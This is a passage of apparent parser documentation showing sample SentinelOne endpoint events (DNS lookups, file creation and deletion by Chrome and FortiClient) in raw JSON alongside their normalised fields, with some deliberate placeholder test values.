\"timestamp\": {\"millisecondsSinceEpoch\": \"1628516010404\"}, \"trueContext\": {\"key\": {\"value\": \"C20F3967ACBB2FE7\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"87E0B0E05D9D6CC8\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542879\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8\", \"fullPid\": {\"pid\": 13796, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515734223\"}}, \"user\": {\"name\": \"CLIENT\\\\t.Naohisa\", \"sid\": \"S-1-5-21-1525252525-7987987987-1111111111-6174\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"C20F3967ACBB2FE7\"}}, \"counters\": {\"moduleLoad\": 90, \"fileCreation\": 45, \"fileDeletion\": 19, \"fileModification\": 101, \"netConnOut\": 31, \"dnsLookups\": 35}}, \"query\": \"lh5.googleusercontent.com\", \"results\": \"type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;\", \"event_type\": \"dns\"}", - "event": { - "action": "dns", - "start": "2021-08-09T13:33:30.404000Z" - }, - "agent": { - "version": "S1-WIN/4.6.14.304" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BA1BE2835D6E4FF7B023C72DCE8B3829", - "uuid": "4d311e18709146cba8797a22e3c20762" - }, - "dns": { - "answers": { - "results": "type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;" - } - }, - "event": { - "type": "dns" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 35, - "file_creation": 45, - "file_deletion": 19, - "file_modification": 101, - "module_load": 90, - "net_conn_out": 31 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.879000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "87E0B0E05D9D6CC8" - }, - "parent": { - "node": { - "key": "BAE25D38782A6941" - } - }, - "root": "E_FALSE", - "session_id": 11, - "true_context": { - "key": "C20F3967ACBB2FE7" - }, - "user": { - "sid": "S-1-5-21-1525252525-7987987987-1111111111-6174" - } - }, - "true_context": { - "key": "C20F3967ACBB2FE7" - } - }, - "dns": { - "question": { - "name": "lh5.googleusercontent.com", - "registered_domain": "googleusercontent.com", - "subdomain": "lh5", - "top_level_domain": "com" - } - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 13796, - "start": "2021-08-09T13:28:54.223000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hosts": [ - "lh5.googleusercontent.com" - ], - "user": [ - "CLIENT\\t.Naohisa" - ] - }, - "user": { - "id": "S-1-5-21-1525252525-7987987987-1111111111-6174", - "name": "CLIENT\\t.Naohisa" - } - } - - ``` - - -=== "file_creation.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba871111111111111\", \"traceId\": \"BABABABABEEE43452345234523423423\", \"agentVersion\": \"S1-WIN/2.2.11.333\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"88888\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542456\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 14896, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515733321\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-6562365326-8585787878-2021012021-6543\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"03267F6915111A61\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"crossProcess\": 1610, \"moduleLoad\": 245, \"fileCreation\": 148, \"fileDeletion\": 58, \"fileModification\": 416, \"registryModification\": 32, \"crossProcessDupThreadHandle\": 20, \"crossProcessDupProcessHandle\": 1590}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"737373ABCDEF7373\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628515733666\"}, \"path\": \"C:\\\\Users\\\\user.name\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\", \"owner\": {}, \"isDir\": \"test_not_E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2206-11-13T06:23:32.121000Z" - }, - "agent": { - "version": "S1-WIN/2.2.11.333" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BABABABABEEE43452345234523423423", - "uuid": "4d311e18709146cba871111111111111" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "737373ABCDEF7373" - } - }, - "host": { - "os": { - "revision": "88888" - } - }, - "process": { - "counters": { - "cross_process": 1610, - "cross_process_dup_process_handle": 1590, - "cross_process_dup_thread_handle": 20, - "file_creation": 148, - "file_deletion": 58, - "file_modification": 416, - "model_child_process": 25, - "module_load": 245, - "os_child_process": 25, - "registry_modification": 32 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.456000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAE25D38782A6941" - }, - "parent": { - "node": { - "key": "03267F6915111A61" - } - }, - "root": "E_TRUE", - "session_id": 11, - "true_context": { - "key": "CCC43343435EABDF" - }, - "user": { - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - } - }, - "true_context": { - "key": "CCC43343435EABDF" - } - }, - "file": { - "created": "2021-08-09T13:28:53.666000Z", - "directory": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome", - "name": "User Data", - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data", - "type": "dir" - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 14896, - "start": "2021-08-09T13:28:53.321000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-6562365326-8585787878-2021012021-6543", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "file_creation2.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba871111111111111\", \"traceId\": \"BABABABABEEE43452345234523423423\", \"agentVersion\": \"S1-WIN/2.2.11.333\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"88888\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"BAE25D38782A6941\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"C8E88AA83F5B15B6\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1628149542654\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2442584\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 14896, \"startTime\": {\"millisecondsSinceEpoch\": \"1628515733932\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-6562365326-8585787878-2021012021-6543\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"03267F6915111A61\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 11, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"CCC43343435EABDF\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"crossProcess\": 1610, \"moduleLoad\": 245, \"fileCreation\": 148, \"fileDeletion\": 58, \"fileModification\": 416, \"registryModification\": 32, \"crossProcessDupThreadHandle\": 20, \"crossProcessDupProcessHandle\": 1590}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"737373ABCDEF7373\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"7474746212121\"}, \"path\": \"C:\\\\Users\\\\user.name\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\98798798-bbb2-9898-aaaa-1212121212f.tmp\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2206-11-13T06:23:32.121000Z" - }, - "agent": { - "version": "S1-WIN/2.2.11.333" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 35, - "trace_id": "BABABABABEEE43452345234523423423", - "uuid": "4d311e18709146cba871111111111111" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "737373ABCDEF7373" - } - }, - "host": { - "os": { - "revision": "88888" - } - }, - "process": { - "counters": { - "cross_process": 1610, - "cross_process_dup_process_handle": 1590, - "cross_process_dup_thread_handle": 20, - "file_creation": 148, - "file_deletion": 58, - "file_modification": 416, - "model_child_process": 25, - "module_load": 245, - "os_child_process": 25, - "registry_modification": 32 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "C8E88AA83F5B15B6" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2442584", - "start": "2021-08-05T07:45:42.654000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "BAE25D38782A6941" - }, - "parent": { - "node": { - "key": "03267F6915111A61" - } - }, - "root": "E_TRUE", - "session_id": 11, - "true_context": { - "key": "CCC43343435EABDF" - }, - "user": { - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - } - }, - "true_context": { - "key": "CCC43343435EABDF" - } - }, - "file": { - "created": "2206-11-13T06:23:32.121000Z", - "extension": "tmp", - "name": "98798798-bbb2-9898-aaaa-1212121212f.tmp", - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data\\98798798-bbb2-9898-aaaa-1212121212f.tmp", - "type": "file" - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "name": "chrome.exe", - "pid": 14896, - "start": "2021-08-09T13:28:53.932000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-6562365326-8585787878-2021012021-6543", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "file_creation3.json" - - ```json - - { - "message": "{\"meta\":{\"uuid\":\"123\",\"traceId\":\"123\",\"agentVersion\":\"S1-WIN/21.7.7.40005\",\"osFamily\":\"windows\",\"osName\":\"Windows Server 2019 Standard\",\"osRevision\":\"17763\",\"computerName\":\"123\",\"machineType\":\"server\",\"mgmtUrl\":\"https://foo.sentinelone.net\"},\"timestamp\":{\"millisecondsSinceEpoch\":\"1660727585201\"},\"event_type\":\"fileCreation\",\"trueContext\":{\"key\":{\"value\":\"CB18415B7D5C7DC1\"}},\"source\":{\"node\":{\"key\":{\"value\":\"D65452060133453B\"}},\"executable\":{\"node\":{\"key\":{\"value\":\"3EFA3EFA3EFA3EFA\"}},\"creationTime\":{},\"owner\":{},\"hashes\":{}},\"fullPid\":{\"pid\":22545,\"startTime\":{\"millisecondsSinceEpoch\":\"1660727582129\"}},\"user\":{},\"interactive\":\"E_FALSE\",\"parent\":{\"node\":{\"key\":{}},\"fullPid\":{\"startTime\":{}}},\"excluded\":\"E_FALSE\",\"name\":\"Unknown file\",\"root\":\"E_TRUE\",\"subsystem\":\"SYS_WIN32\",\"sessionId\":4294967295,\"isWow64\":\"E_FALSE\",\"isRedirectedCommandProcessor\":\"E_FALSE\",\"trueContext\":{\"key\":{\"value\":\"CB18415B7D5C7DC1\"}},\"counters\":{\"fileCreation\":3,\"fileModification\":6}},\"targetFile\":{\"node\":{\"key\":{\"value\":\"39AD9E819F6BE850\"}},\"creationTime\":{\"millisecondsSinceEpoch\":\"1660727585201\"},\"path\":\"Anonymized Data\",\"owner\":{},\"isDir\":\"E_FALSE\",\"hashes\":{},\"fileLocation\":\"Local\"}}\n", - "event": { - "action": "fileCreation", - "start": "2022-08-17T09:13:05.201000Z" - }, - "agent": { - "version": "S1-WIN/21.7.7.40005" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://foo.sentinelone.net", - "trace_id": "123", - "uuid": "123" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "39AD9E819F6BE850" - } - }, - "host": { - "os": { - "revision": "17763" - } - }, - "process": { - "counters": { - "file_creation": 3, - "file_modification": 6 - }, - "excluded": "E_FALSE", - "executable": { - "node": { - "key": "3EFA3EFA3EFA3EFA" - } - }, - "family": "SYS_WIN32", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "D65452060133453B" - }, - "root": "E_TRUE", - "session_id": 4294967295, - "true_context": { - "key": "CB18415B7D5C7DC1" - } - }, - "true_context": { - "key": "CB18415B7D5C7DC1" - } - }, - "file": { - "created": "2022-08-17T09:13:05.201000Z", - "extension": "Anonymized Data", - "name": "Anonymized Data", - "path": "Anonymized Data", - "type": "file" - }, - "host": { - "name": "123", - "os": { - "family": "windows", - "name": "Windows Server 2019 Standard" - }, - "type": "server" - }, - "process": { - "pid": 22545, - "start": "2022-08-17T09:13:02.129000Z", - "title": "Unknown file" - } - } - - ``` - - -=== "file_creation_missing_fields.json" - - ```json - - { - "message": "{\"timestamp\": {\"millisecondsSinceEpoch\": \"1629899209700\"}, \"meta\": {\"seqId\": 45, \"uuid\": \"6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab\", \"traceId\": \"E1A04C7727EB41E5A3D0FF068D4BE544\", \"agentVersion\": \"S1-WIN/4.4.3.149\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19043\", \"computerName\": \"LAPTOP-COM4\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"trueContext\": {\"key\": {\"value\": \"0506A768B8828E35\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"2FFCA561EE506063\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"E4CD922E494CA3C5\"}}, \"creationTime\": {}, \"path\": \"C:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiESNAC.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"4253328\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"commandLine\": \"FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018\", \"fullPid\": {\"pid\": 6104, \"startTime\": {\"millisecondsSinceEpoch\": \"1629878298032\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"D3250A9CB211CC1E\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"FortiClient Network Access Control\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"0506A768B8828E35\"}}, \"counters\": {\"moduleLoad\": 1948, \"fileCreation\": 647, \"fileDeletion\": 647, \"fileModification\": 2141, \"exeModification\": 40, \"netConnOut\": 203, \"registryModification\": 654, \"dnsLookups\": 30}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"4685AD1C6BC7D31D\"}}, \"creationTime\": {}, \"path\": \"C:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\large_data_upload\\\\0.bin\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}, \"event_type\": \"fileCreation\"}", - "event": { - "action": "fileCreation", - "start": "2021-08-25T13:46:49.700000Z" - }, - "agent": { - "version": "S1-WIN/4.4.3.149" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 45, - "trace_id": "E1A04C7727EB41E5A3D0FF068D4BE544", - "uuid": "6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab" - }, - "event": { - "type": "fileCreation" - }, - "file": { - "location": "Local", - "node": { - "key": "4685AD1C6BC7D31D" - } - }, - "host": { - "os": { - "revision": "19043" - } - }, - "process": { - "counters": { - "dns_lookups": 30, - "file_creation": 647, - "file_deletion": 647, - "file_modification": 2141, - "module_load": 1948, - "net_conn_out": 203, - "registry_modification": 654 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "node": { - "key": "E4CD922E494CA3C5" - }, - "size_bytes": "4253328" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "2FFCA561EE506063" - }, - "parent": { - "node": { - "key": "D3250A9CB211CC1E" - } - }, - "root": "E_FALSE", - "true_context": { - "key": "0506A768B8828E35" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "true_context": { - "key": "0506A768B8828E35" - } - }, - "file": { - "extension": "bin", - "name": "0.bin", - "path": "C:\\Program Files\\Fortinet\\FortiClient\\large_data_upload\\0.bin", - "type": "file" - }, - "host": { - "name": "LAPTOP-COM4", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018", - "executable": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "name": "FortiESNAC.exe", - "pid": 6104, - "start": "2021-08-25T07:58:18.032000Z", - "title": "FortiClient Network Access Control", - "working_directory": "C:\\Program Files\\Fortinet\\FortiClient" - }, - "related": { - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "file_deletion.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFJG3VW54HS5577EY3CY83M8\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634706079\"}, \"event_type\": \"fileDeletion\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"0D7A69B0C2C26E73\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 26188, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516876708\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"41CA3A862279A7BC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"modelChildProcess\": 761, \"osChildProcess\": 761, \"crossProcess\": 332191, \"moduleLoad\": 1177, \"fileCreation\": 295369, \"fileDeletion\": 282078, \"fileModification\": 849997, \"netConnOut\": 5, \"registryModification\": 788, \"crossProcessDupThreadHandle\": 2431, \"crossProcessDupProcessHandle\": 329760, \"dnsLookups\": 5}}, \"targetFile\": {\"node\": {\"key\": {\"value\": \"780E03EC9E64BBE3\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631634705524\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Service Worker\\\\CacheStorage\\\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\\\650d1e12-cd20-438f-8c15-b58c713de9c7\\\\todelete_429a860c9774094b_0_1.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"hashes\": {}, \"fileLocation\": \"Local\"}}", - "event": { - "action": "fileDeletion", - "start": "2021-09-14T15:51:46.079000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFJG3VW54HS5577EY3CY83M8", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "fileDeletion" - }, - "file": { - "location": "Local", - "node": { - "key": "780E03EC9E64BBE3" - } - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "cross_process": 332191, - "cross_process_dup_process_handle": 329760, - "cross_process_dup_thread_handle": 2431, - "dns_lookups": 5, - "file_creation": 295369, - "file_deletion": 282078, - "file_modification": 849997, - "model_child_process": 761, - "module_load": 1177, - "net_conn_out": 5, - "os_child_process": 761, - "registry_modification": 788 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0D7A69B0C2C26E73" - }, - "parent": { - "node": { - "key": "41CA3A862279A7BC" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "true_context": { - "key": "6B188EE5E8C5F24F" - } - }, - "file": { - "created": "2021-09-14T15:51:45.524000Z", - "extension": "exe", - "name": "todelete_429a860c9774094b_0_1.exe", - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\650d1e12-cd20-438f-8c15-b58c713de9c7\\todelete_429a860c9774094b_0_1.exe", - "type": "file" - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 26188, - "start": "2021-09-13T07:07:56.708000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - 